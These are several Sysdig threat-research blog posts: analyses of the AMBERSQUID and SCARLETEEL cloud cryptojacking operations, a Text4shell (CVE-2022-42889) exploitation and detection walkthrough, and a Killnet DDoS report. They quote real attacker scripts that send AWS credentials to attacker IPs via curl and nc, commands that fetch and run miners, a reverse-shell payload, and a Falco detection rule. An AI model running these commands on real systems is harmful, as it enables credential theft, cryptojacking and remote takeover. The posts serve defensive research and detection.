
They also specified the possible instance types for the build instance to be created:

BuildInstanceType:
    Type: CommaDelimitedList
    Default: "c5.xlarge,c5a.xlarge,r5.xlarge,r5a.xlarge"

Then, it creates eight EC2 image pipelines with the following input JSON file:

{
    "name": "task$i",
    "description": "Builds image",
    "containerRecipeArn": "$CONTAINER",
    "infrastructureConfigurationArn": "$INFRA",
    "distributionConfigurationArn": "$DISTRI",
    "imageTestsConfiguration": {
        "imageTestsEnabled": true,
        "timeoutMinutes": 60
    },
    "schedule": {
        "scheduleExpression": "cron(* 0/1 * * ?)",
        "pipelineExecutionStartCondition": "EXPRESSION_MATCH_ONLY"
    },
    "status": "ENABLED"
}

The most significant part of the previous code snippet is the cron expression since it tells the pipeline to start a new build every minute.

Their Docker images contain one of those JSON files that was previously used in a real environment and leaks an AWS Account ID (it might belong to one of the attackers’ testing environments):

{
    "name": "task8",
    "description": "Builds image",
    "containerRecipeArn": "arn:aws:imagebuilder:us-east-1:909030629651:container-recipe/amazonlinux2-container-recipe/1.0.0",
    "infrastructureConfigurationArn": "arn:aws:imagebuilder:us-east-1:909030629651:infrastructure-configuration/amazonlinux2-containerimage-infrastructure-configuration",
    "distributionConfigurationArn": "arn:aws:imagebuilder:us-east-1:909030629651:distribution-configuration/amazonlinux2-container-distributionconfiguration",
    "imageTestsConfiguration": {
        "imageTestsEnabled": true,
        "timeoutMinutes": 60
    },
    "schedule": {
        "scheduleExpression": "cron(* 0/1 * * ?)",
        "pipelineExecutionStartCondition": "EXPRESSION_MATCH_ONLY"
    },
    "status": "ENABLED"
}

EC2 Auto Scaling

Amazon EC2 Auto Scaling is a feature that allows users to handle the availability of compute capacity by adding or removing EC2 instances using scaling policies of their choice. Launch templates can be used to define the EC2 instances to be deployed.

The script scale.sh creates the following EC2 launch template for each region:

SCRIPT="c3VkbyB5dW0gaW5zdGFsbCBkb2NrZXIgLXkgJiYgc3VkbyBzZXJ2aWNlIGRvY2tlciBzdGFydCAmJiBzdWRvIGRvY2tlciBwdWxsIGRlbGJpZGFsdWFuL2VwaWN4ICYmIHN1ZG8gZG9ja2VyIHJ1biAtZCBkZWxiaWRhbHVhbi9lcGljeA=="

AMI=$(aws ec2 describe-images --filters "Name=manifest-location,Values=amazon/amzn2-ami-kernel-5.10-hvm-2.0.20230404.0-x86_64-gp2" --query 'Images[0].ImageId'| tr -d '"' 2> /dev/null)
export AMI
aws ec2 create-launch-template \
    --launch-template-name task \
    --version-description task \
    --launch-template-data '{"ImageId": "'$AMI'","UserData": "'$SCRIPT'","InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192}}}'

The instance AMI is Amazon Linux 2, with the minimum requirements set to 4 vCPU and 8 GB of memory. The Base64 decoded script inserted in the UserData contains the commands to run one of the attackers’ Docker images running a cryptominer:

sudo yum install docker -y && sudo service docker start && sudo docker pull delbidaluan/epicx && sudo docker run -d delbidaluan/epicx

Then, the script creates two auto scaling groups, named “task” and “task1,” that spin up instances using the previous launch template as shown below:

aws autoscaling create-auto-scaling-group --auto-scaling-group-name task --vpc-zone-identifier "$SUBNET,$SUBNET1" --cli-input-json '{"DesiredCapacityType":"units","MixedInstancesPolicy":{"LaunchTemplate":{"LaunchTemplateSpecification":{"LaunchTemplateName":"task","Version":"1"},"Overrides":[{"InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192},"CpuManufacturers":["intel","amd"]}}]},"InstancesDistribution":{"OnDemandPercentageAboveBaseCapacity":100,"SpotAllocationStrategy":"capacity-optimized","OnDemandBaseCapacity":8,"OnDemandPercentageAboveBaseCapacity":100}},"MinSize":8,"MaxSize":8,"DesiredCapacity":8,"DesiredCapacityType":"units"}'
aws autoscaling create-auto-scaling-group --auto-scaling-group-name task1 --vpc-zone-identifier "$SUBNET,$SUBNET1" --cli-input-json '{"DesiredCapacityType":"units","MixedInstancesPolicy":{"LaunchTemplate":{"LaunchTemplateSpecification":{"LaunchTemplateName":"task","Version":"1"},"Overrides":[{"InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192},"CpuManufacturers":["intel","amd"]}}]},"InstancesDistribution":{"OnDemandPercentageAboveBaseCapacity":0,"SpotAllocationStrategy":"capacity-optimized","OnDemandBaseCapacity":0,"OnDemandPercentageAboveBaseCapacity":0}},"MinSize":8,"MaxSize":8,"DesiredCapacity":8,"DesiredCapacityType":"units"}'

Each group includes eight instances: the first group has only On-Demand Instances (“OnDemandPercentageAboveBaseCapacity” is set to 100) while the second group has only Spot Instances (“OnDemandPercentageAboveBaseCapacity” is set to 0). Also, by setting “SpotAllocationStrategy” to “capacity-optimized,” the attackers choose the strategy that has the lowest risk of interruption according to the documentation.

Sagemaker

Amazon SageMaker is a platform to build, train, and deploy machine learning (ML) models. Users can write code to train, deploy, and validate models with notebook instances that are ML compute instances running the Jupyter Notebook App. For every notebook instance, users can define a lifecycle configuration, which is a collection of shell scripts that run upon the creation or start of a notebook instance. This is precisely where the attackers put the script to run their miner after creating several notebook instances with the same configuration.

For each region, the attacker runs note.sh. This script creates a SageMaker notebook instance with type ml.t3.medium. The “OnStart” field in the configuration contains “a shell script that runs every time you start a notebook instance,” and here they inserted the following commands encoded in base64 to run the miner:

sudo yum install docker -y && sudo service docker start && sudo docker pull delbidaluan/note && sudo docker run -d delbidaluan/note

Other scripts

salah.sh (“salah” means “wrong” in Indonesian) is run for each region and in turn runs delete.sh. This script deletes all the CodeCommit repositories previously created.

stoptrigger.sh, for each region, this script stops some Glue triggers.

Cost to the Victim

In consideration of the amount of services that are used in this operation, we wanted to make a simulation of the cost that this would entail for a victim. These costs make assumptions based on regions and scale which can be easily changed by the attacker.

ServiceDeployCost/day
Amplify (pricing)8 regions x 5 apps x 1440 min$576
CodeBuild (pricing)8 regions x 3 projects (small, medium and large) x 1440 min$403
Cloudformation (pricing)8 regions x 8 tasks (c5.xlarge, c5a.xlarge, r5.xlarge, r5a,xlarge) x (0.2 * 24 h)$307
Sagemaker (pricing)4 regions x 8 instances (ml.t3.2xlarge) x (0.399 * 24 h)$306
EC2 Auto Scaling groups (pricing)4 regions x 16 instances x (0.2 * 24 h)$307
ECS (pricing)16 regions x 24 h x 30 tasks x (2 vCPU * 0.013 + 4GB * 0.001)$345
Total$2244

Another point to consider with the table above is that the default scripts are not operating at full power. For example, in some services they exploit only four regions, sometimes eight, and other times 16. The cost would be much higher if they always target all regions and scale up their resource usage.

Wallets and Revenues

CryptocurrencyWallet addressesNotes
ZephyrZEPHYR2vyrpcg2e2sJaA88EM6aGaLCBdiYfiHffrs5b3Fa4p1qpoEPH4UabmhJr5YYF7CxJykLTJmESQWaB9ARNuhb6jvptapVq3vReceived: 3251.16 ZEPH = $6,924
TidecoinTFrQ7u9spKk8MBgX6Bze3oxPbs3Yh1tAsqReceived: 250,381 TDC = $6,993
VerusRNu4dQGeFDSPP5iHthijkfnzgxcW2nPde9Received: 4561.913 VRSC = $1,916
Monero89v8xC6Mu2tX27WZKhefTuSnN7f3JMHQSAuoD7ZRe1bV2wfExSTDZe4JwaM4qpjKAoWbAbbnqLBmGCFECiwnXdfSKHt85H3 (2miners)
8B7ommXjcEpTAHKFFyci1v5ADrqvEbphhHrzbBfJgvqjecbik7vcLonh8rYSstbBxgD8AccrJYEukDaXZB8ns3kTLiXL8BN (c3pool)
837MGitRYxgEV158RDenxVUfb5mN6qzz78Z1WeaDoiqC4K7H8Pj556vHJoVXL2MCJ5WCGVZTBiRmqJFxeJG3WSQmGKhPC31 (nanopool)
Paid: 17.636 XMR = $2,506
QRLQ010500bc3733dbd0576ca26a8595d59b577a4d1e09c019856abfa103b8f08ec0ed36735e0e2f35
Q01050074da7be4fe8216f789041227c08ccbf310617362641336e1f282c398937635a5d3ebbdbf
N/A
Bamboo007DE31E4FD8213FBCE3586A3D2260C962142BBC605BB41C41N/A

Conclusion

Cloud Service Providers (CSPs) like AWS provide a vast array of different services for their customers. While most financially motivated attackers target compute services, such as EC2, it is important to remember that many other services also provide access to compute resources (albeit more indirectly). It is easy for these services to be overlooked from a security perspective since there is less visibility compared to that available through runtime threat detection.

All services provided by a CSP must be monitored for malicious use. If runtime threat detection isn’t possible, higher level logging about the services usage should be monitored in order to catch threats like AMBERSQUID. If malicious activity is detected, response actions should be taken quickly to disable the involved services and limit the damage. While this operation occurred on AWS, other CSPs could easily be the next target.

The post AWS’s Hidden Threat: AMBERSQUID Cloud-Native Cryptojacking Operation appeared first on Sysdig.

]]>
SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto https://sysdig.com/blog/scarleteel-2-0/ Tue, 11 Jul 2023 10:00:00 +0000 https://sysdig.com/?p=75348 SCARLETEEL, an operation reported on by the Sysdig Threat Research Team last February, continues to thrive, improve tactics, and steal...

The post SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto appeared first on Sysdig.

]]>
SCARLETEEL, an operation reported on by the Sysdig Threat Research Team last February, continues to thrive, improve tactics, and steal proprietary data. Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture. AWS Fargate, a more sophisticated environment to breach, has also become a target as their new attack tools allow them to operate within that environment.

In their most recent activities, we saw a similar strategy to what was reported in the previous blog: compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

Having watched SCARLETEEL previously, we know that they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.

Operational Updates

We will go through the main attack, highlighting how it evolved compared to the attack reported in the last article. The enhancements include:

  • Scripts are aware of being in a Fargate-hosted container and can collect credentials.
  • Escalation to Admin in the victim’s AWS account and spin up EC2 instances running miners.
  • Tools and techniques improved in order to expand their attack capabilities and their defense evasion techniques.
  • Attempted exploitation of IMDSv2 in order to retrieve the token and then use it to retrieve the AWS credentials.
  • Changes in C2 domains multiple times, including utilizing public services used to send and retrieve data.
  • Using AWS CLI and pacu on the exploited containers to further exploit AWS.
  • Using peirates to further exploit Kubernetes.

Motivations

AWS Credentials

After exploiting some JupyterLab notebook containers deployed in a Kubernetes cluster, the SCARLETEEL operation proceeded with multiple types of attacks. One of the primary goals of those attacks was stealing AWS credentials to further exploit the victim’s AWS environment.

The actor leveraged several versions of scripts that steal credentials, employing different techniques and exfiltration endpoints. An old version of one of those scripts was posted on GitHub here. It is worth noting that the C2 domain embedded in that script, 45[.]9[.]148[.]221, belongs to SCARLETEEL, as reported in our previous article.

Those scripts search for AWS credentials in different places: by contacting the instance metadata (both IMDSv1 and IMDSv2), in the filesystem, and in the Docker containers created in the target machine (even if they are not running).

Looking at the exfiltration function, we can see that it sends the Base64 encoded stolen credentials to the C2 IP Address. Interestingly, it uses shell built-ins to accomplish this instead of curl. This is a more stealthy way to exfiltrate data as curl and wget are not used, which many tools specifically monitor.

send_aws_data(){
cat $CSOF
SEND_B64_DATA=$(cat $CSOF | base64 -w 0)
rm -f $CSOF
dload http://45.9.148.221/in/in.php?base64=$SEND_B64_DATA > /dev/null
}

The Sysdig Threat Research Team analyzed several similar scripts that can be found on VirusTotal:

In those scripts, the previous function has different exfiltration endpoints. For instance, the following function sends the credentials to 175[.]102[.]182[.]6, 5[.]39[.]93[.]71:9999 and also uploads them to temp.sh:

send_aws_data(){
find /tmp/ -type f -empty -delete

SEND_B64_DATA=$(cat $CSOF | base64 -w 0)
curl -sLk -o /dev/null http://175.102.182.6/.bin/in.php?base64=$SEND_B64_DATA

SEND_AWS_DATA_NC=$(cat $CSOF | nc 5.39.93.71 9999)
SEND_AWS_DATA_CURL=$(curl --upload-file $CSOF https://temp.sh)
echo $SEND_AWS_DATA_NC
echo ""
echo $SEND_AWS_DATA_CURL
echo ""
rm -f $CSOF
}

Looking at those IP addresses, we can state that 175[.]102[.]182[.]6 belongs to the attackers while 5[.]39[.]93[.]71:9999 is the IP address of termbin[.]com, which takes a string input and returns a unique URL that shows that string when accessed allowing for the storage of data. This site was primarily used to exfiltrate data during the attack. Since the response sent from that IP is not sent anywhere but STDOUT (such as the response from https://temp[.]sh/), this suggests that those attacks were either not fully automated or conducting actions based on script output. The attacker read the unique URL in the terminal and accessed it to grab the credentials.

In some versions of the script, it tried to exploit IMDSv2 to retrieve the credentials of the node role, as shown below. IMDSv2 is often suggested as a solution to security issues with the metadata endpoint, but it is still able to be abused by attackers. It just requires an extra step, and its efficacy is highly dependent on configuration.

Specifically, the first call is used to retrieve the session token, which is then used to retrieve the AWS credentials. However, this attempt failed because the target machine was a container inside an EC2 instance with the default hop limit set to 1. Had the attackers been on the host itself, they would have succeeded in downloading the credentials. According to the AWS documentation, “In a container environment, if the hop limit is 1, the IMDSv2 response does not return because going to the container is considered an additional network hop.” Amazon recommends setting the hop limit to 2 in containers, which suggests this would be successful in many container environments.

In the containers which were using IMDSv1, the attackers succeeded in stealing the AWS credentials. Next, they installed AWS CLI binary and Pacu on the exploited containers and configured them with the retrieved keys. They used Pacu to facilitate the discovery and exploitation of privilege escalations in the victim’s AWS account.

The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol. The command below shows that they configured the keys for the Russian S3 environment with the “configure” command and then attempted to access their buckets.

By using the “--endpoint-url” option, they did not send the API requests to the default AWS services endpoints, but instead to hb[.]bizmrg[.]com, which redirects to mcs[.]mail[.]ru/storage, a Russian S3-compatible object storage. These requests were not logged in the victim’s CloudTrail, since they occurred on the mcs[.]mail[.]ru site. This technique allows the attacker to use the AWS client to download their tools and exfiltrate data, which may not raise suspicion. It is a variation of “Living off of the Land” attacks since the AWS client is commonly installed on cloud systems.

Kubernetes

Other than stealing AWS credentials, the SCARLETEEL actor performed other attacks including targeting Kubernetes. In particular, they also leveraged peirates, a tool to further exploit Kubernetes. The “get secrets”, “get pods” and “get namespaces” APIs called in the screenshot below are part of the execution of peirates. This shows that the attackers are aware of Kubernetes in their attack chains and will attempt to exploit the environment.

DDoS-as-a-Service

In the same attack where the actor used the AWS CLI pointing to their cloud environment, they also downloaded and executed Pandora, a malware belonging to the Mirai Botnet. The Mirai malware primarily targets IoT devices connected to the internet, and is responsible for many large-scale DDoS attacks since 2016. This attack is likely part of a DDoS-as-a-Service campaign, where the attacker provides DDoS capabilities for money. In this case, the machine infected by the Pandora malware would become a node of the botnet used by the attacker to target the victim chosen by some client.

Post Exploitation

Privilege Escalation

After collecting the AWS keys of the node role via instance metadata, the SCARLETEEL actor started conducting automated reconnaissance in the victim’s AWS environment. After some failed attempts to run EC2 instances, they tried to create access keys for all admin users. The victim used a specific naming convention for all of their admin accounts similar to “adminJane,” “adminJohn,” etc. One of the accounts was inadvertently named inconsistently with the naming convention, using a capitalized ‘A’ for ‘Admin’ such as, “AdminJoe.” This resulted in the following policy being bypassed by the attackers:

This policy prevents attackers from creating access keys for every user containing “admin” in their username. Therefore, they managed to gain access to the “AdminJoe” user by creating access keys for it.

Once the attacker obtained the admin access, their first objective was gaining persistence. Using the new admin privileges, the adversary created new users and a new set of access keys for all the users in the account, including admins. One of the users created was called “aws_support” which they switched to in order to conduct reconnaissance.

Cryptojacking

The next objective was financially motivated: cryptomining. With the admin access, the attacker created 42 instances of c5.metal/r5a.4xlarge in the compromised account by running the following script:

#!/bin/bash
ulimit -n 65535 ; export LC_ALL=C.UTF-8 ; export LANG=C.UTF-8
export PATH=$PATH:/var/bin:/bin:/sbin:/usr/sbin:/usr/bin
yum install -y bash curl;yum install -y docker;yum install -y openssh-server
apt update --fix-missing;apt install -y curl;apt install -y bash;apt install -y wget
apk update;apk add bash;apk add curl;apk add wget;apk add docker
if ! type docker; then curl -sLk $SRC/cmd/set/docker.sh | bash ; fi
export HOME=/root
curl -Lk http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U
history -cw
clear

The attacker was quickly caught due to the noise generated spawning an excessive number of instances running miners. Once the attacker was caught and access to the admin account was limited, they started to use the other new accounts created or the account compromised to achieve the same purposes by stealing secrets from Secret Manager or updating SSH keys to run new instances. The attacker failed to proceed due to lack of privileges.

Artifact Analysis

Analysis of the script .a.sh

Downloaded from: 175[.]102[.]182[.]6/.bin/.g/.a.sh

VirusTotal analysis: https://www.virustotal.com/gui/file/57ddc709bcfe3ade1dd390571622e98ca0f49306344d2a3f7ac89b77d70b7320

After installing curl, netcat, and AWS CLI, it tries to retrieve the EC2 instance details from the AWS metadata. The attacker tried to exploit IMDSv2 in order to retrieve the token and then use it to retrieve the AWS credentials.

Then, the script sends the credentials both via netcat and curl and removes evidence of this execution.

However this execution terminated without success because of the inappropriate IMDS version.

So, immediately, the attacker executed another script.

Analysis of the script .a.i.sh

Downloaded from: 175[.]102[.]182[.]6/.bin/.a.i.sh

This script is almost identical to the script published on Github.

It starts deleting the current IPtables rules and sets the firewall to make them fully permissive:

Then, it launches the get_aws_data() function in order to retrieve EC2 instance security credentials. Various metadata endpoints are used to accomplish this task, but It also looks for another IP Address: 169[.]254[.]170[.]2. This IP Address is used by tasks which include AWS Fargate allowing this script to run in containers hosted there as well.

In order to retrieve those credentials the script uses this bash function, which utilizes shell built-ins, with the aim of evading detection mechanisms based on more common tools, such as curl and wget.

The get_aws_data() function also searches for credentials in all Docker containers in the target machine (even if they are not running) and in the filesystem:

After writing all the retrieved keys and credentials into random filenames, the script calls send_aws_data() to exfiltrate them:

Finally, the script removes the evidences of the attack, calling the notraces() bash function:

Analysis of the script setup_c3pool_miner.sh

Downloaded from: c9b9-2001-9e8-8aa-f500-ce88-25db-3ce0-e7da[.]ngrok-free[.]app/setup_c3pool_miner.sh

VirusTotal analysis: https://www.virustotal.com/gui/file/2c2a4a8832a039726f23de8a9f6019a0d0f9f2e4dfe67f0d20a696e0aebc9a8f

It runs the miner with the wallet address belonging to SCARLETEEL:

Also, this script runs an Alpine Docker image installing static-curl in it. Then, it removes previous c3pool miner and kills possible xmrig processes, before downloading an “advanced version” of xmrig:

As shown above, the miner is extracted in /root/.configure/ . The name of the miner binary is containerd, which then is executed. From containerd.log, this is the information about the miner:

The Monero miner is executed in background using the names for containered and the systemd service as a defense evasion technique:

Conclusion

The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes. Since the last report, they have enhanced their toolkit to include multiple new tools and a new C2 infrastructure, making detection more difficult. Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but as we saw in the previous report, Intellectual Property is still a priority.

Defending against a threat like SCARLETEEL requires multiple layers of defense. Runtime threat detection and response is critical to understanding when an attack has occurred, but with tools like Vulnerability Management, CSPM, and CIEM, these attacks could be prevented. Missing any of these layers could open up an organization to a significant financial risk.

The post SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto appeared first on Sysdig.

]]>
Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell https://sysdig.com/blog/cve-2022-42889-text4shell/ Thu, 20 Oct 2022 07:52:04 +0000 https://sysdig.com/?p=57148 A new critical vulnerability CVE-2022-42889 a.k.a Text4shell, similar to the old Spring4shell and log4shell, was originally reported by Alvaro Muñoz...

The post Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell appeared first on Sysdig.

]]>
A new critical vulnerability CVE-2022-42889 a.k.a Text4shell, similar to the old Spring4shell and log4shell, was originally reported by Alvaro Muñoz on the very popular Apache Commons Text library.

The vulnerability is rated as a critical 9.8 severity and it is always a remote code execution (RCE) which would permit attackers to execute arbitrary code on the machine and compromise the entire host.

The affected Apache Commons Text versions 1.5 through 1.9 and it has been patched in version 1.10.

Preliminary

Apache Commons Text is a Java library described as “a library focused on algorithms working on strings”. we can see it as a general-purpose text manipulation toolkit.

Even if you are familiar with coding you may have run into Commons Text as a dependency in your code or it might be used by an application you are currently running in your laptop or production environment.

The CVE-2022-42889 issue

The vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the “script”, “dns” and “url” lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups.

In order to exploit the vulnerabilities, the following requirements must be met:

  • Run a version of Apache Commons Text from version 1.5 to 1.9
  • Use the StringSubstitutor interpolator

It is important to specify that the StringSubstitutor interpolator is not as widely used as the string substitution in Log4j, which led to Log4Shell.

How to exploit CVE-2022-42889

To reproduce the attack, the vulnerable component was deployed in a Docker container, accessible from an EC2 instance, which would be controlled by the attacker. Using the netcat (nc) command, we can open a reverse shell connection with the vulnerable application.

The vulnerable web application exposes a search API in which the query gets interpolated via the StringSubstitutor of Commons Text:

http://web.app/text4shell/attack?search=<query>

The following payload could be used to exploit the vulnerability and open a reverse shell:

${script:javascript:java.lang.Runtime.getRuntime.exec()'nc 192.168.49.1 9090 -e /bin/sh')}

This payload is composed of “${prefix:name}”, which triggers the String Lookup. As mentioned above, “script”, “dns” and “url” are the keys that can be used as the prefix to exploit the vulnerability.

Before sending the crafted request, we need to set up the reverse shell connection using the netcat (nc) command to listen on port 9090.

nc -nlvp 9090

We can now send the crafted request, URL encoding the payload, as shown below.

Curl payload text4shell cve-2022-42889

We can see that the attacker successfully opened a connection with the vulnerable application.

text4shell cve-2022-42889 nc connection

Now the attacker can interact with the vulnerable machine as root and execute arbitrary code.

The impact of CVE-2022-42889

According to the CVSSv3 system, it scores 9.8 as CRITICAL severity.
The severity is Critical due to the easy exploitability and the huge potential impacts in terms of confidentiality, integrity and availability. As we showed in the previous section with a crafted request you can take full control over the vulnerable system.
However, it isn’t likely the vulnerabilities will have the same impacts as the previous log4shell and spring4shell.
Looking at the vulnerable component, the likelihood of the exploitation is related to the use of the Apache Commons Text library. Specifically, it is possible to exploit it only if it implements the StringSubstitutor object with some user-controlled input. This implementation in production environments is not as common as the vulnerable string substitution in Log4j. Therefore, the large-scale impact of Text4Shell is not really comparable to Log4Shell.

Detecting and Mitigating CVE-2022-42889

If you’re impacted by CVE-2022-42889, you should update the application to version 1.10.

As we have seen for the previous CVE-2022-22963, we can detect this vulnerability at three different phases of the application lifecycle:

  • Build process: With an image scanner.
  • Deployment process: Thanks to an image scanner on the admission controller.
  • Runtime detection phase using a runtime detection engine: Detect post explotation behaviors in already deployed hosts or pods with Falco.

Once the attacker has total control, depending on the actions he performs, we will detect him with one or another Falco rule. In the case that the attacker uses a reverse shell, here we would have an example of a rule that would detect it. To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false

Using Sysdig image scanner, it’s possible to detect the vulnerable package

Sysdig detect cve-2022-42889 text4shell

Conclusion

Even though the CVE-2022-42889 is exploitable under specific conditions which makes the vulnerability not as popular as the others seen during this year, it’s still important to take immediate actions.

To be safe, patch with the latest version to mitigate vulnerabilities and use scanners to find out if you are affected and. It’s also important to take the necessary measures to mitigate the vulnerability and never stop monitoring your infrastructure or applications at runtime.


If you want to know more about what is a vulnerability, dig deeper with What is a Vulnerability:

The post Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell appeared first on Sysdig.

]]>
Killnet cyber attacks against Italy and NATO countries https://sysdig.com/blog/killnet-italy-and-nato/ Wed, 18 May 2022 12:27:29 +0000 https://sysdig.com/?p=50504 On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of...

The post Killnet cyber attacks against Italy and NATO countries appeared first on Sysdig.

]]>
On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of Health, were taken offline and unreachable for a few hours. This was day one of a multiday cyber attack, which targeted other Italian websites as well as other countries. The pro-Russian hacker groups Killnet and Legion claimed the attacks through their Telegram channels, killnet_channel and legion_russia, and used the Mirai malware to perform their DDoS (distributed denial-of-service) attacks to Italian websites.

If confirmed, this would be the first claimed attack against Italy from pro-Russian cyber groups since the beginning of the war in Ukraine.

The Sysdig Threat Research Team has been collecting and monitoring data about the Mirai group and similar Mirai malwares for some time. In the last 90 days, we monitored more than 1000 attacks from different types of malwares based on Mirai.

In this article, we cover what happened through the declarations of the parties involved. We will also provide context to the Mirai botnet and explain how it is possible to detect Mirai activities through Falco, the CNCF runtime security tool.

The threat actor Killnet

Killnet has been operating as a threat actor since the beginning of 2022. The Killnet telegram channel was created on Jan. 23, 2022, and the Legion channel was launched four months later, on April 28. Based on communications on the Killnet channel, it seems that Legion is a subgroup of Killnet.

Before targeting Italy, over the past few months, they have targeted government and private companies in other countries, including the United States, Estonia, Latvia, Germany, Poland, Czech Republic, and Ukraine. The websites they are targeting make it clear that their targets include countries that oppose Russia.

We can retrieve other information about Killnet from an interview with their founder, published on April 22. Known as killmilk, they said, “Killnet originally appeared as a service on the dark web.” With the conflict in Ukraine starting, they decided to stop the commercial use of their botnet to support the fight against Ukraine and NATO countries, without actually stealing “money even from their enemies.” During the interview he also mentioned that their targets are “only those who are the conductor of evil and aggression, and we do not touch the civilian population.”

According to Killnet, the botnet they use for their attacks is composed for the vast majority of foreign devices (only 6% of Russian machines), and they are financed by enthusiasts and patriots who “have nothing to do with the authorities.”

Talking about findings, on March 3, Killnet published some cryptocurrency addresses asking for financial support in their official channel, as shown below.

Killnet APT group

Checking for those addresses, it is possible to verify the amount of money they received (at the time of this writing):

The main modus operandi of Killnet, Legion, and similar groups is to create a botnet of hundreds of thousands machines infected with the famous Mirai malware and to use it to perpetrate DDoS attacks.

What is the Mirai Botnet?

The Mirai malware is responsible for many large-scale DDoS attacks since 2016. The main target of this malware is Internet of Things (IoT) devices, because a few years ago, their default configurations were not sufficiently secure and most of the IoT devices exposed on the internet had their default configuration.

Mirai diagram botnet

Since 2016, the botnet of IoT devices infected with Mirai has hit several popular websites in several countries, including GitHub, Twitter, Reddit, Netflix, and Airbnb, which has cost hundreds of millions of dollars.

Since the Mirai group published their malware source code on Hack Forums, many cyber criminals downloaded it and reused the same techniques to create other malwares. Some of them aim to target specific zero day vulnerabilities, others target embedded processors or hijack cryptocurrency mining operations, as we talked about recently in our blog.

Well-prepared cyber groups can customize the Mirai malware in order to keep it updated with the most recent vulnerabilities.

What happened? Killnet attacks in detail

Killnet’s attacks succeeded in making the websites of some Italian institutions unreachable. Also, they targeted the Eurovision voting system and the websites of some German and Polish companies, although those attacks were mitigated.

Let’s try to summarize the events that have happened so far.

  • May 11, 2022
    • 16:49 CET – Legion posted a list of Italian websites hit by their DDoS attack
    • 17:57 CET – Legion posted a list of Polish and German websites that were going to be the next target
  • May 12, 2022
    • 3:42 CET – Legion posted another list of Italian websites that went unreachable
    • 11:30 CET – Killnet informed that they did “military cyber exercises,” and that they “will go on the offensive” as soon as the training finishes
  • May 14, 2022
    • 22:48 CET – Legion incited their supporters to perform a DDoS attack towards the Eurovision voting system
  • May 15, 2022
    • 7:51 CET – The Italian State Police informed the public in a tweet that they thwarted a cyber attack against Eurovision
    • 22:48 CET – Killnet posted a video where they declared cyber war on 10 countries
  • May 16 2022
    • 1:29 CET – Killnet claimed a DDoS attack against the website of the Italian State Police
  • May 17 2022
    • 4:06 CET – Killnet claimed another DDoS attack against the Italian State Polic website

Let’s see in detail what happened using information collected from the threat group official telegram chats.

  • May 11 at 16:49 CET – It all started when Legion posted a list of Italian websites that were verified to be unreachable. The translated title of their message is ‘Squad “Mirai” Beat and beats only commander Mirai Attack on Italy.’
Mirai botnet attack Italy

A few minutes later, Killnet posted the following message warning about next activities:

Mirai botnet attack Italy and Spain
  • May 11 at 17:57 CET – Legion posted another message with a list of Polish and German websites that were going to be the next target of another cyber group called Jacky. The message title is ‘Squad “Jacky” Hitting these sites. Anyone who wants to help.
Mirai botnet German police
  • May 11 at about 20:00 CET – All hit Italian targets were restored.
  • May 12 at 2:35 CET – Killnet confirmed that the attack to the previously listed websites was performed by Legion, which seems to be a subgroup of Killnet.
Killnet hits news
  • May 12 at 3:42 CET – Legion posted another short list of Italian websites that went unreachable, including the Senate website. This message was titled ‘Demonstrative Attack on the network infrastructure of Italy from the commander of the detachment “MIRAI.”
Demostrative attack Killnet italian
  • May 12 at 11:30 CET – Killnet claimed some attacks, too. Actually, Killnet specified that they did not attack, but it was a “military cyber exercises,” and that they “will go on the offensive” against Italy and Spain as soon as the training finishes.
Killnet explanation attack
  • May 14 at 22:48 CET – Legion incited their supporters to perform a DDoS attack towards the Eurovision voting system, giving some advice about how to proceed.
Killnet incit to perform DDoS attacks
  • May 15 at 7:51 CET – The Italian State Police released a tweet that they thwarted a cyber attack against Eurovision.
  • May 15 at 22:48 CET – Killnet posted a video where they declared cyber war on 10 countries: US, UK, Germany, Italy, Latvia, Romania, Lithuania, Estonia, Poland, and Ukraine.
Killnet posted video
  • May 16 at 1:29 CET – Killnet were ironic about the previous tweet and posted an image of what seems to be the website of the Italian State Police being hit by a DDoS attack.
Killnet show results DDoS with Mirai botnet

After one hour, as shown below, Killnet announced that they did not attack the Eurovision website and confirmed their war declaration, including the Italian State Police among the targets.

Killnet italian police
